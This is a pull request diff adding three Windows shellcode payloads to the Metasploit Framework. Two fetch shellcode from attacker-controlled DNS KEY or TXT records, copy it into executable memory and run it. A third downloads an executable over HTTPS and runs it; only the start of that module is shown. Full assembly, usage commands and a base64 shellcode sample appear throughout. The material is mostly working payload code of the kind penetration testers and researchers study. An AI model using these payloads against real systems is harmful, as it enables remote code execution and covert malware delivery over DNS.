### PR TITLE
Added 3 new payloads

### DIFF
--- a/modules/payloads/singles/windows/dns_query_exec.rb
+++ b/modules/payloads/singles/windows/dns_query_exec.rb
@@ -9,9 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-
 require 'msf/core'
-
 
 module Metasploit3
 
@@ -198,12 +196,7 @@ allocate_memory:
 get_dnsname:
 	call get_dnsname_return
 	db "#{dnsname}", 0x00
-
-
-
 EOS
 		the_payload = Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string
 	end
-
-
 end

--- a/modules/payloads/singles/windows/dns_query_exec.rb
+++ b/modules/payloads/singles/windows/dns_query_exec.rb
@@ -44,19 +44,14 @@ module Metasploit3
 
 	# 
 	# Usage :
-	# 1. Generate the shellcode you want to execute
+	# 1. Generate the shellcode you want to execute. Make sure it does not contain \x00,\x0a or \x0d
 	# 2. base64 encode the raw output, put everything on one line. 
 	# Example
-	# ./msfpayload windows/messagebox TEXT="You have been pwned" TITLE="Friendly message from corelanc0d3r" R > /tmp/msgbox.bin
+	# ./msfpayload windows/messagebox TEXT="You have been pwned" TITLE="Friendly message from corelanc0d3r" R |
+	#    ./msfencode -b '\x00\x0a\x0d' -t raw > /tmp/msgbox.bin
 	# base64 < /tmp/msgbox.bin 
-	#  2eub2XQk9DHSsncxyWSLcTCLdgyLdhyLRgiLfiCLNjhPGHXzWQHR/+Fgi2wkJItFPItUKHgB6otK
-	#  GItaIAHr4zRJizSLAe4x/zHA/KyEwHQHwc8NAcfr9Dt8JCh14YtaJAHrZosMS4taHAHriwSLAeiJ
-	#  RCQcYcOyCCnUieWJwmiOTg7sUuif////iUUEu37Y4nOHHCRS6I7///+JRQhobGwgQWgzMi5kaHVz
-	#  ZXKIXCQKieZW/1UEicJQu6iiTbyHHCRS6GH///9oM3JYIGhuYzBkaHJlbGFobSBjb2ggZnJvaHNh
-	#  Z2VoIG1lc2huZGx5aEZyaWUx24hcJCKJ42huZWRYaG4gcHdoIGJlZWhoYXZlaFlvdSAxyYhMJBOJ
-	#  4THSUlNRUv/QMcBQ/1UI
-
-	# 3. Create a DNS KEY record in a zone you control and paste the base64 encoded version of the payload as KEY
+	#  <put the output on one line>
+	# 3. Create a DNS (public) KEY record in a zone you control and paste the base64 encoded version of the payload as public key
 	# 4. Generate this payload to perform the DNS query, retrieve the payload & execute it 
 
 	#
@@ -71,8 +66,8 @@ module Metasploit3
 
 		#create actual payload
 		payload_data = <<EOS
-	cld
-	call start
+	cld			; clear direction flag
+	call start		; start main routine
 ; Stephen Fewer's block_api
 ; block_api code (Stephen Fewer)
 api_call:
@@ -174,8 +169,8 @@ dnsquery:
 	jmp get_dnsname
 get_dnsname_return:
 	pop eax			; get ptr to dnsname (lpstrName)
-	push esp
-	pop ebx
+	push esp		; prepare ppQueryResultsSet
+	pop ebx			;   (put ptr to ptr to stack on stack)
 	sub ebx,4
 	push ebx
 	push 0			; pReserved

--- a/modules/payloads/singles/windows/dns_query_exec.rb
+++ b/modules/payloads/singles/windows/dns_query_exec.rb
@@ -18,8 +18,8 @@ module Metasploit3
 
 	def initialize(info = {})
 		super(merge_info(info,
-			'Name'          => 'DNS KEY Record Payload Execution',
-			'Description'   => 'Performs a KEY query for a given DNS record & executes the returning payload',
+			'Name'          => 'DNSKEY Record Payload Execution',
+			'Description'   => 'Performs a DNSKEY query for a given DNS record & executes the returning payload',
 			'Author'        =>
 				[
 					'corelanc0d3r <peter.ve[at]corelan.be>'
@@ -49,7 +49,7 @@ module Metasploit3
 	#    ./msfencode -b '\x00\x0a\x0d' -t raw > /tmp/msgbox.bin
 	# base64 < /tmp/msgbox.bin 
 	#  <put the output on one line>
-	# 3. Create a DNS (public) KEY record in a zone you control and paste the base64 encoded version of the payload as public key
+	# 3. Create a DNSKEY record in a zone you control and paste the base64 encoded version of the payload as public key
 	# 4. Generate this payload to perform the DNS query, retrieve the payload & execute it 
 
 	#
@@ -58,7 +58,7 @@ module Metasploit3
 	def generate
 
 		dnsname		= datastore['DNSRECORD']
-		wType		= 0x0019	#DNS_TYPE_KEY
+		wType		= 0x0019	#DNS_TYPE_KEY (DNSKEY)
 		wTypeOffset	= 0x1c
 		bufferreg 	= "edi"
 

--- a/modules/payloads/singles/windows/dns_query_exec.rb
+++ b/modules/payloads/singles/windows/dns_query_exec.rb
@@ -68,7 +68,6 @@ module Metasploit3
 			# DNS_QUERY_RETURN_MESSAGE (0x200)
 			# DNS_QUERY_BYPASS_CACHE (0x08)
 			# DNS_QUERY_NO_HOSTS_FILE (0x40)
-		end
 
 		bufferreg 	= "edi"
 

--- a/modules/payloads/singles/windows/dns_query_exec.rb
+++ b/modules/payloads/singles/windows/dns_query_exec.rb
@@ -1,0 +1,214 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+module Metasploit3
+
+	include Msf::Payload::Windows
+	include Msf::Payload::Single
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'DNS KEY Record Payload Execution',
+			'Description'   => 'Performs a KEY query for a given DNS record & executes the returning payload',
+			'Author'        =>
+				[
+					'corelanc0d3r <peter.ve[at]corelan.be>'
+				],
+			'License'       => MSF_LICENSE,
+			'Version'       => "$Revision$",
+			'Platform'      => 'win',
+			'Arch'          => ARCH_X86
+		))
+
+		# EXITFUNC is not supported 
+		deregister_options('EXITFUNC')
+
+		# Register command execution options
+		register_options(
+			[
+				OptString.new('DNSRECORD', [ true, "The DNS record to query" ]),
+			], self.class)
+	end
+
+	# 
+	# Usage :
+	# 1. Generate the shellcode you want to execute
+	# 2. base64 encode the raw output, put everything on one line. 
+	# Example
+	# ./msfpayload windows/messagebox TEXT="You have been pwned" TITLE="Friendly message from corelanc0d3r" R > /tmp/msgbox.bin
+	# base64 < /tmp/msgbox.bin 
+	#  2eub2XQk9DHSsncxyWSLcTCLdgyLdhyLRgiLfiCLNjhPGHXzWQHR/+Fgi2wkJItFPItUKHgB6otK
+	#  GItaIAHr4zRJizSLAe4x/zHA/KyEwHQHwc8NAcfr9Dt8JCh14YtaJAHrZosMS4taHAHriwSLAeiJ
+	#  RCQcYcOyCCnUieWJwmiOTg7sUuif////iUUEu37Y4nOHHCRS6I7///+JRQhobGwgQWgzMi5kaHVz
+	#  ZXKIXCQKieZW/1UEicJQu6iiTbyHHCRS6GH///9oM3JYIGhuYzBkaHJlbGFobSBjb2ggZnJvaHNh
+	#  Z2VoIG1lc2huZGx5aEZyaWUx24hcJCKJ42huZWRYaG4gcHdoIGJlZWhoYXZlaFlvdSAxyYhMJBOJ
+	#  4THSUlNRUv/QMcBQ/1UI
+
+	# 3. Create a DNS KEY record in a zone you control and paste the base64 encoded version of the payload as KEY
+	# 4. Generate this payload to perform the DNS query, retrieve the payload & execute it 
+
+	#
+	# Construct the payload
+	#
+	def generate
+
+		dnsname		= datastore['DNSRECORD']
+		wType		= 0x0019	#DNS_TYPE_KEY
+		wTypeOffset	= 0x1c
+		bufferreg 	= "edi"
+
+		#create actual payload
+		payload_data = <<EOS
+	cld
+	call start
+; Stephen Fewer's block_api
+; block_api code (Stephen Fewer)
+api_call:
+	pushad                 ; We preserve all the registers for the caller, bar EAX and ECX.
+	mov ebp, esp           ; Create a new stack frame
+	xor edx, edx           ; Zero EDX
+	mov edx, fs:[edx+48]   ; Get a pointer to the PEB
+	mov edx, [edx+12]      ; Get PEB->Ldr
+	mov edx, [edx+20]      ; Get the first module from the InMemoryOrder module list
+next_mod:
+	mov esi, [edx+40]      ; Get pointer to modules name (unicode string)
+	movzx ecx, word [edx+38] ; Set ECX to the length we want to check 
+	xor edi, edi           ; Clear EDI which will store the hash of the module name
+loop_modname:            ;
+	xor eax, eax           ; Clear EAX
+	lodsb                  ; Read in the next byte of the name
+	cmp al, 'a'            ; Some versions of Windows use lower case module names
+	jl not_lowercase       ;
+	sub al, 0x20           ; If so normalise to uppercase
+not_lowercase:           ;
+	ror edi, 13            ; Rotate right our hash value
+	add edi, eax           ; Add the next byte of the name
+	loop loop_modname      ; Loop untill we have read enough
+	; We now have the module hash computed
+	push edx               ; Save the current position in the module list for later
+	push edi               ; Save the current module hash for later
+	; Proceed to iterate the export address table, 
+	mov edx, [edx+16]      ; Get this modules base address
+	mov eax, [edx+60]      ; Get PE header
+	add eax, edx           ; Add the modules base address
+	mov eax, [eax+120]     ; Get export tables RVA
+	test eax, eax          ; Test if no export address table is present
+	jz get_next_mod1       ; If no EAT present, process the next module
+	add eax, edx           ; Add the modules base address
+	push eax               ; Save the current modules EAT
+	mov ecx, [eax+24]      ; Get the number of function names  
+	mov ebx, [eax+32]      ; Get the rva of the function names
+	add ebx, edx           ; Add the modules base address
+	; Computing the module hash + function hash
+get_next_func:           ;
+	jecxz get_next_mod     ; When we reach the start of the EAT (we search backwards), process the next module
+	dec ecx                ; Decrement the function name counter
+	mov esi, [ebx+ecx*4]   ; Get rva of next module name
+	add esi, edx           ; Add the modules base address
+	xor edi, edi           ; Clear EDI which will store the hash of the function name
+	; And compare it to the one we want
+loop_funcname:           ;
+	xor eax, eax           ; Clear EAX
+	lodsb                  ; Read in the next byte of the ASCII function name
+	ror edi, 13            ; Rotate right our hash value
+	add edi, eax           ; Add the next byte of the name
+	cmp al, ah             ; Compare AL (the next byte from the name) to AH (null)
+	jne loop_funcname      ; If we have not reached the null terminator, continue
+	add edi, [ebp-8]       ; Add the current module hash to the function hash
+	cmp edi, [ebp+36]      ; Compare the hash to the one we are searchnig for 
+	jnz get_next_func      ; Go compute the next function hash if we have not found it
+	; If found, fix up stack, call the function and then value else compute the next one...
+	pop eax                ; Restore the current modules EAT
+	mov ebx, [eax+36]      ; Get the ordinal table rva      
+	add ebx, edx           ; Add the modules base address
+	mov cx, [ebx+2*ecx]    ; Get the desired functions ordinal
+	mov ebx, [eax+28]      ; Get the function addresses table rva  
+	add ebx, edx           ; Add the modules base address
+	mov eax, [ebx+4*ecx]   ; Get the desired functions RVA
+	add eax, edx           ; Add the modules base address to get the functions actual VA
+	; We now fix up the stack and perform the call to the desired function...
+finish:
+	mov [esp+36], eax      ; Overwrite the old EAX value with the desired api address for the upcoming popad
+	pop ebx                ; Clear off the current modules hash
+	pop ebx                ; Clear off the current position in the module list
+	popad                  ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
+	pop ecx                ; Pop off the origional return address our caller will have pushed
+	pop edx                ; Pop off the hash value our caller will have pushed
+	push ecx               ; Push back the correct return value
+	jmp eax                ; Jump into the required function
+	; We now automagically return to the correct caller...
+get_next_mod:            ;
+	pop eax                ; Pop off the current (now the previous) modules EAT
+get_next_mod1:           ;
+	pop edi                ; Pop off the current (now the previous) modules hash
+	pop edx                ; Restore our position in the module list
+	mov edx, [edx]         ; Get the next module
+	jmp next_mod     	; Process this module
+
+; actual routine
+start:
+	pop ebp			; get ptr to block_api routine
+
+;first load dnsapi.dll
+load_dnsapi:
+	push 0x00006970        ; Push 'dnsapi' to the stack
+	push 0x61736e64        ; ...
+	mov esi, esp           ; Get a pointer to 'dnsapi'
+	push esp               ; Push a pointer to the 'dnsapi' string on the stack.
+	push 0x0726774C        ; kernel32.dll!LoadLibraryA
+	call ebp               ; LoadLibraryA( "dnsapi" )
+
+dnsquery:
+	jmp get_dnsname
+get_dnsname_return:
+	pop eax			; get ptr to dnsname (lpstrName)
+	push esp
+	pop ebx
+	sub ebx,4
+	push ebx
+	push 0			; pReserved
+	push ebx		; ppQueryResultsSet
+	push 0			; pExtra
+	push 0x48		; Options : DNS_QUERY_BYPASS_CACHE (0x08) + DNS_QUERY_NO_HOSTS_FILE (0x40)
+	push #{wType}		; wType
+	push eax		; lpstrName
+	push 0xC99CC96A 	; dnsapi.dll!DnsQuery_A
+	call ebp		; 
+
+get_query_result:
+	pop #{bufferreg}
+	add #{bufferreg},#{wTypeOffset}	; get pointer to payload
+
+allocate_memory:
+	push 0x40              ; PAGE_EXECUTE_READWRITE
+	push 0x1000            ; MEM_COMMIT
+	push 0x1 	       ; one byte is enough
+	push #{bufferreg}      ; DNS payload
+	push 0xE553A458        ; kernel32.dll!VirtualAlloc
+	call ebp              
+	jmp #{bufferreg}
+
+get_dnsname:
+	call get_dnsname_return
+	db "#{dnsname}", 0x00
+
+
+
+EOS
+		the_payload = Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string
+	end
+
+
+end

--- a/modules/payloads/singles/windows/dns_txt_query_exec.rb
+++ b/modules/payloads/singles/windows/dns_txt_query_exec.rb
@@ -247,8 +247,8 @@ copy_piece_to_heap:
 	push edi		; save target for next copy
 	dec ebx			; decrement counter
 	cmp bl,0		; are we done yet ?
-	je jump_to_payload	; nope
-	jmp find_next_part	; yes, find the next piece
+	je jump_to_payload	; yes
+	jmp find_next_part	; nope, find the next piece
 
 jump_to_payload:
 	pop #{bufferreg}

--- a/modules/payloads/singles/windows/dns_txt_query_exec.rb
+++ b/modules/payloads/singles/windows/dns_txt_query_exec.rb
@@ -37,7 +37,7 @@ module Metasploit3
 		register_options(
 			[
 				OptString.new('DNSZONE', [ true, "The DNS zone to query" ]),
-				OptInt.new('PARTS', [ true, "The number of TXT records to retrieve", 3]),
+				OptInt.new('PARTS', [ true, "The number of TXT records that contain shellcode", 3]),
 			], self.class)
 	end
 
@@ -48,7 +48,7 @@ module Metasploit3
 	#   Example : 
 	# ./msfpayload windows/messagebox TITLE="Friendly message from corelanc0d3r" TEXT="DNS Payloads FTW" R | ./msfencode -e x86/alpha_mixed Bufferregister=EDI -t raw
 	#   Output : 654 bytes
-	# 2. Split the output into parts of 250 bytes (+ remaining bytes)
+	# 2. Split the output into parts of 250 bytes (+ remaining bytes as last part)
 	#   In case of 654 bytes of payload, there will be 2 parts of 250 bytes, and one part of 154 bytes
 	# 3. Create the TXT records in a zone you control and put in the tag (see later) + 250 bytes of the payload per TXT record
 	#   The last TXT record will have less than 250 bytes, that's fine
@@ -58,9 +58,9 @@ module Metasploit3
 	#
 	#
 	# TAGS :
-	# 1par : tag in front of first part	(tag + 250 bytes)
-	# 2par : tag in front of second part	(tag + 250 bytes  (or remaining bytes))
-	# 3par : tag in front of third part	(tag + 250 bytes  (or remaining bytes))
+	# 1-pt : 4 byte tag in front of first part	(tag + 250 bytes)
+	# 2-pt : 4 byte tag in front of second part	(tag + 250 bytes  (or remaining bytes))
+	# 3-pt : 4 byte tag in front of third part	(tag + 250 bytes  (or remaining bytes))
 	# etc
 
 	#
@@ -230,7 +230,7 @@ alloc_space:
 	push eax		; save pointer, twice
 	push eax
 	mov edx,#{bufferreg}
-	mov eax,0x72617030	; 0par
+	mov eax,0x74702d30	; 0-pt
 	mov dh,bh
 	mov dl,03		; start startlocation of search in edx
 

--- a/modules/payloads/singles/windows/dns_txt_query_exec.rb
+++ b/modules/payloads/singles/windows/dns_txt_query_exec.rb
@@ -180,7 +180,6 @@ load_dnsapi:
 	mov ah,0x69
 	push eax        	; Push 'dnsapi' to the stack
 	push 0x61736e64        	; ...
-	mov esi, esp           	; Get a pointer to 'dnsapi'
 	push esp               	; Push a pointer to the 'dnsapi' string on the stack.
 	push 0x0726774C        	; kernel32.dll!LoadLibraryA
 	call ebp               	; LoadLibraryA( "dnsapi" )
@@ -194,12 +193,10 @@ get_dnsname_return:
 	pop ebx			;   (put ptr to ptr to stack on stack)
 	sub ebx,4
 	push ebx
-	xor esi,esi
-	push esi		; pReserved
+	push 0x0		; pReserved
 	push ebx		; ppQueryResultsSet
-	push esi		; pExtra
-	mov si,#{queryoptions}
-	push esi 		; Options
+	push 0x0		; pExtra
+	push #{queryoptions} 		; Options
 	push #{wType}		; wType
 	push eax		; lpstrName
 	push 0xC99CC96A 	; dnsapi.dll!DnsQuery_A
@@ -238,18 +235,18 @@ find_next_part:
 	inc eax			; set current tag
 	mov edi,edx		; start for search
 find_this_part:
-	sub edi,0x3
-	scasd
+	sub edi,0x3		; make sure we start at begin
+	scasd			; is this the tag we are looking for ?
 	jne find_this_part
 copy_piece_to_heap:
 	mov esi,edi		; set source
 	pop edi			; get target for copy
-	xor ecx,ecx
+	xor ecx,ecx		; clear ecx
 	mov cl,0xfa		; always copy 250 bytes, no matter what
 	rep movsb		; copy from ESI to EDI
 	push edi		; save target for next copy
-	dec ebx			; do we need another piece ?
-	cmp bl,0
+	dec ebx			; decrement counter
+	cmp bl,0		; are we done yet ?
 	je jump_to_payload	; nope
 	jmp find_next_part	; yes, find the next piece
 

--- a/modules/payloads/singles/windows/dns_txt_query_exec.rb
+++ b/modules/payloads/singles/windows/dns_txt_query_exec.rb
@@ -73,11 +73,11 @@ module Metasploit3
 		wTypeOffset	= 0x1c
 		nr_of_recs	= "%d" % datastore['PARTS']
 
-		queryoptions	= 0x24a
+		queryoptions	= 0x248
 			# DNS_QUERY_RETURN_MESSAGE (0x200)
 			# DNS_QUERY_BYPASS_CACHE (0x08)
 			# DNS_QUERY_NO_HOSTS_FILE (0x40)
-			# DNS_QUERY_ONLY_TCP (0x02)
+			# DNS_QUERY_ONLY_TCP (0x02) <- not used atm
 
 		bufferreg 	= "edi"
 

--- a/modules/payloads/singles/windows/dns_txt_query_exec.rb
+++ b/modules/payloads/singles/windows/dns_txt_query_exec.rb
@@ -1,0 +1,263 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+module Metasploit3
+
+	include Msf::Payload::Windows
+	include Msf::Payload::Single
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'DNS TXT Record Payload Execution',
+			'Description'   => 'Performs a TXT query for given DNS record(s) & executes the returning payload',
+			'Author'        =>
+				[
+					'corelanc0d3r <peter.ve[at]corelan.be>'
+				],
+			'License'       => MSF_LICENSE,
+			'Version'       => "$Revision$",
+			'Platform'      => 'win',
+			'Arch'          => ARCH_X86
+		))
+
+		# EXITFUNC is not supported 
+		deregister_options('EXITFUNC')
+
+		# Register command execution options
+		register_options(
+			[
+				OptString.new('DNSZONE', [ true, "The DNS zone to query" ]),
+				OptInt.new('PARTS', [ true, "The number of TXT records to retrieve", 3]),
+			], self.class)
+	end
+
+	# 
+	# Usage :
+	# 1. Generate the shellcode you want to deliver via a DNS TXT query. 
+	#   Make sure it is alpha_mixed or alpha_upper and uses EDI as bufferregister
+	#   Example : 
+	# ./msfpayload windows/messagebox TITLE="Friendly message from corelanc0d3r" TEXT="DNS Payloads FTW" R | ./msfencode -e x86/alpha_mixed Bufferregister=EDI -t raw
+	#   Output : 654 bytes
+	# 2. Split the output into parts of 250 bytes (+ remaining bytes)
+	#   In case of 654 bytes of payload, there will be 2 parts of 250 bytes, and one part of 154 bytes
+	# 3. Create the TXT records in a zone you control and put in the tag (see later) + 250 bytes of the payload per TXT record
+	#   The last TXT record will have less than 250 bytes, that's fine
+	#   It's important to use exactly 254 bytes of TXT data for all but the last part (4 bytes of tag, 250 bytes of shellcode)
+	# 4. use the dns_txt_query payload in the exploit, specify the number of TXT records to use (default : 3) 
+	#   Example : /msfpayload windows/dns_txt_query_exec DNSZONE=corelan.eu PARTS=3
+	#
+	#
+	# TAGS :
+	# 1par : tag in front of first part	(tag + 250 bytes)
+	# 2par : tag in front of second part	(tag + 250 bytes  (or remaining bytes))
+	# 3par : tag in front of third part	(tag + 250 bytes  (or remaining bytes))
+	# etc
+
+	#
+	# Construct the payload
+	#
+	def generate
+
+		dnsname		= datastore['DNSZONE']
+		wType		= 0x0010	#DNS_TYPE_TEXT (TEXT)
+		wTypeOffset	= 0x1c
+		nr_of_recs	= datastore['PARTS']
+
+		queryoptions	= 0x24a
+			# DNS_QUERY_RETURN_MESSAGE (0x200)
+			# DNS_QUERY_BYPASS_CACHE (0x08)
+			# DNS_QUERY_NO_HOSTS_FILE (0x40)
+			# DNS_QUERY_ONLY_TCP (0x02)
+
+		bufferreg 	= "edi"
+
+		#create actual payload
+		payload_data = <<EOS
+	cld			; clear direction flag
+	call start		; start main routine
+; Stephen Fewer's block_api
+; block_api code (Stephen Fewer)
+api_call:
+	pushad                 ; We preserve all the registers for the caller, bar EAX and ECX.
+	mov ebp, esp           ; Create a new stack frame
+	xor edx, edx           ; Zero EDX
+	mov edx, fs:[edx+48]   ; Get a pointer to the PEB
+	mov edx, [edx+12]      ; Get PEB->Ldr
+	mov edx, [edx+20]      ; Get the first module from the InMemoryOrder module list
+next_mod:
+	mov esi, [edx+40]      ; Get pointer to modules name (unicode string)
+	movzx ecx, word [edx+38] ; Set ECX to the length we want to check 
+	xor edi, edi           ; Clear EDI which will store the hash of the module name
+loop_modname:            ;
+	xor eax, eax           ; Clear EAX
+	lodsb                  ; Read in the next byte of the name
+	cmp al, 'a'            ; Some versions of Windows use lower case module names
+	jl not_lowercase       ;
+	sub al, 0x20           ; If so normalise to uppercase
+not_lowercase:           ;
+	ror edi, 13            ; Rotate right our hash value
+	add edi, eax           ; Add the next byte of the name
+	loop loop_modname      ; Loop untill we have read enough
+	; We now have the module hash computed
+	push edx               ; Save the current position in the module list for later
+	push edi               ; Save the current module hash for later
+	; Proceed to iterate the export address table, 
+	mov edx, [edx+16]      ; Get this modules base address
+	mov eax, [edx+60]      ; Get PE header
+	add eax, edx           ; Add the modules base address
+	mov eax, [eax+120]     ; Get export tables RVA
+	test eax, eax          ; Test if no export address table is present
+	jz get_next_mod1       ; If no EAT present, process the next module
+	add eax, edx           ; Add the modules base address
+	push eax               ; Save the current modules EAT
+	mov ecx, [eax+24]      ; Get the number of function names  
+	mov ebx, [eax+32]      ; Get the rva of the function names
+	add ebx, edx           ; Add the modules base address
+	; Computing the module hash + function hash
+get_next_func:           ;
+	jecxz get_next_mod     ; When we reach the start of the EAT (we search backwards), process the next module
+	dec ecx                ; Decrement the function name counter
+	mov esi, [ebx+ecx*4]   ; Get rva of next module name
+	add esi, edx           ; Add the modules base address
+	xor edi, edi           ; Clear EDI which will store the hash of the function name
+	; And compare it to the one we want
+loop_funcname:           ;
+	xor eax, eax           ; Clear EAX
+	lodsb                  ; Read in the next byte of the ASCII function name
+	ror edi, 13            ; Rotate right our hash value
+	add edi, eax           ; Add the next byte of the name
+	cmp al, ah             ; Compare AL (the next byte from the name) to AH (null)
+	jne loop_funcname      ; If we have not reached the null terminator, continue
+	add edi, [ebp-8]       ; Add the current module hash to the function hash
+	cmp edi, [ebp+36]      ; Compare the hash to the one we are searchnig for 
+	jnz get_next_func      ; Go compute the next function hash if we have not found it
+	; If found, fix up stack, call the function and then value else compute the next one...
+	pop eax                ; Restore the current modules EAT
+	mov ebx, [eax+36]      ; Get the ordinal table rva      
+	add ebx, edx           ; Add the modules base address
+	mov cx, [ebx+2*ecx]    ; Get the desired functions ordinal
+	mov ebx, [eax+28]      ; Get the function addresses table rva  
+	add ebx, edx           ; Add the modules base address
+	mov eax, [ebx+4*ecx]   ; Get the desired functions RVA
+	add eax, edx           ; Add the modules base address to get the functions actual VA
+	; We now fix up the stack and perform the call to the desired function...
+finish:
+	mov [esp+36], eax      ; Overwrite the old EAX value with the desired api address for the upcoming popad
+	pop ebx                ; Clear off the current modules hash
+	pop ebx                ; Clear off the current position in the module list
+	popad                  ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
+	pop ecx                ; Pop off the origional return address our caller will have pushed
+	pop edx                ; Pop off the hash value our caller will have pushed
+	push ecx               ; Push back the correct return value
+	jmp eax                ; Jump into the required function
+	; We now automagically return to the correct caller...
+get_next_mod:            ;
+	pop eax                ; Pop off the current (now the previous) modules EAT
+get_next_mod1:           ;
+	pop edi                ; Pop off the current (now the previous) modules hash
+	pop edx                ; Restore our position in the module list
+	mov edx, [edx]         ; Get the next module
+	jmp next_mod     	; Process this module
+
+; actual routine
+start:
+	pop ebp			; get ptr to block_api routine
+
+;first load dnsapi.dll
+load_dnsapi:
+	xor eax,eax
+	mov al,0x70
+	mov ah,0x69
+	push eax        	; Push 'dnsapi' to the stack
+	push 0x61736e64        	; ...
+	mov esi, esp           	; Get a pointer to 'dnsapi'
+	push esp               	; Push a pointer to the 'dnsapi' string on the stack.
+	push 0x0726774C        	; kernel32.dll!LoadLibraryA
+	call ebp               	; LoadLibraryA( "dnsapi" )
+
+dnsquery:
+	jmp get_dnsname
+get_dnsname_return:
+	pop esi			; get ptr to dnsname (lpstrName)
+	push esp		; prepare ppQueryResultsSet
+	pop ebx			;   (put ptr to ptr to stack on stack)
+	sub ebx,4
+	push ebx
+	xor eax,eax
+	push eax		; pReserved
+	push ebx		; ppQueryResultsSet
+	push eax		; pExtra
+	mov ax,#{queryoptions}	; Options
+	push eax
+	push #{wType}		; wType
+	push esi		; lpstrName
+	push 0xC99CC96A 	; dnsapi.dll!DnsQuery_A
+	call ebp		; 
+	; eax = 0
+
+get_query_result:
+	pop #{bufferreg}
+	add #{bufferreg},#{wTypeOffset}	; get pointer to answer
+	xor ebx,ebx
+	add bl,#{nr_of_recs}		; nr of parts
+	inc ebx
+	mov #{bufferreg},[#{bufferreg}] ; ptr to first part
+
+alloc_space:
+	push 0x40		; RWX
+	mov ah,0x10
+	push eax		; MEM_COMMIT 0x1000
+	mov ah,0x20
+	push eax		; dwSize
+	push 0x0		; target
+	push 0xE553A458        	; kernel32.dll!VirtualAlloc
+	call ebp 
+	push eax		; save pointer, twice
+	push eax
+	mov edx,#{bufferreg}
+	mov eax,0x72617030	; 0par
+	mov dh,bh
+	mov dl,03		; start startlocation of search in edx
+
+find_next_part:
+	inc eax			; set current tag
+	mov edi,edx		; start for search
+find_this_part:
+	sub edi,0x3
+	scasd
+	jne find_this_part
+copy_piece_to_heap:
+	mov esi,edi		; set source
+	pop edi			; get target for copy
+	xor ecx,ecx
+	mov cl,0xfa		; always copy 250 bytes, no matter what
+	rep movsb		; copy from ESI to EDI
+	push edi		; save target for next copy
+	dec ebx			; do we need another piece ?
+	cmp bl,1
+	je jump_to_payload	; nope
+	jmp find_next_part	; yes, find the next piece
+
+jump_to_payload:
+	pop #{bufferreg}
+	pop #{bufferreg}	; pointer to begin of payload
+	jmp #{bufferreg}	; and jump
+
+
+get_dnsname:
+	call get_dnsname_return
+	db "#{dnsname}", 0x00
+EOS
+		the_payload = Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string
+	end
+end

--- a/modules/payloads/singles/windows/dns_txt_query_exec.rb
+++ b/modules/payloads/singles/windows/dns_txt_query_exec.rb
@@ -222,7 +222,7 @@ alloc_space:
 	push 0x40		; RWX
 	mov ah,0x10
 	push eax		; MEM_COMMIT 0x1000
-	mov ah,0x20
+	mov ah,0x40
 	push eax		; dwSize
 	push 0x0		; target
 	push 0xE553A458        	; kernel32.dll!VirtualAlloc

--- a/modules/payloads/singles/windows/download_exec_https.rb
+++ b/modules/payloads/singles/windows/download_exec_https.rb
@@ -94,10 +94,12 @@ module Metasploit3
 			# get desired protocol
 			if target_uri.start_with?'http://'
 				proto = "http"
+				port_nr = 80
 				dwflags_asm = "push (0x80000000 | 0x04000000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags\n"
 			end
 			if target_uri.start_with?'ftp://'
 				proto = "ftp"
+				port_nr = 21
 				dwflags_asm = "push (0x80000000 | 0x04000000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags\n"
 			end
 

--- a/modules/payloads/singles/windows/download_exec_https.rb
+++ b/modules/payloads/singles/windows/download_exec_https.rb
@@ -336,14 +336,14 @@ get_filename_return:
 download_prep:
 	xchg eax, ebx          	; place the file handle in ebx
 	xor eax,eax		; zero eax
-	mov ax,0x104		; we'll download 0x100 bytes at a time
+	mov ax,0x304		; we'll download 0x300 bytes at a time
 	sub esp,eax		; reserve space on stack
 
 download_more:
 	push esp               	; &bytesRead
 	lea ecx,[esp+0x8]	; target buffer
 	xor eax,eax
-	mov ah,0x01		; eax => 100
+	mov ah,0x03		; eax => 300
 	push eax              	; read length
 	push ecx		; target buffer on stack
 	push esi               	; hRequest

--- a/modules/payloads/singles/windows/download_exec_https.rb
+++ b/modules/payloads/singles/windows/download_exec_https.rb
@@ -50,9 +50,9 @@ module Metasploit3
 	#
 	def generate
 
-		port_nr		= datastore['PORT'] || 443	
+		port_nr		= datastore['PORT'] || 443
 		server_host	= datastore['RHOST']
-		server_uri	= datastore['URI'] 
+		server_uri	= datastore['URI']
 		filename	= datastore['EXE']
 
 		#create actual payload
@@ -238,7 +238,7 @@ try_it_again:
 	jmp set_security_options
 
 dbl_get_server_host:
-	 jmp get_server_host
+	jmp get_server_host
 
 get_server_uri:
 	call httpopenrequest
@@ -334,12 +334,7 @@ get_server_host:
 
 server_host:
 	db "#{server_host}", 0x00
-
-
-
 EOS
 		the_payload = Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string
 	end
-
-
 end

--- a/modules/payloads/singles/windows/download_exec_https.rb
+++ b/modules/payloads/singles/windows/download_exec_https.rb
@@ -1,0 +1,345 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+module Metasploit3
+
+	include Msf::Payload::Windows
+	include Msf::Payload::Single
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Windows Executable Download & Execute (https), supports proxy',
+			'Description'   => 'Download an EXE from a URL using HTTPS (with proxy support) and execute it',
+			'Author'        =>
+				[
+					'corelanc0d3r <peter.ve[at]corelan.be>'
+				],
+			'License'       => MSF_LICENSE,
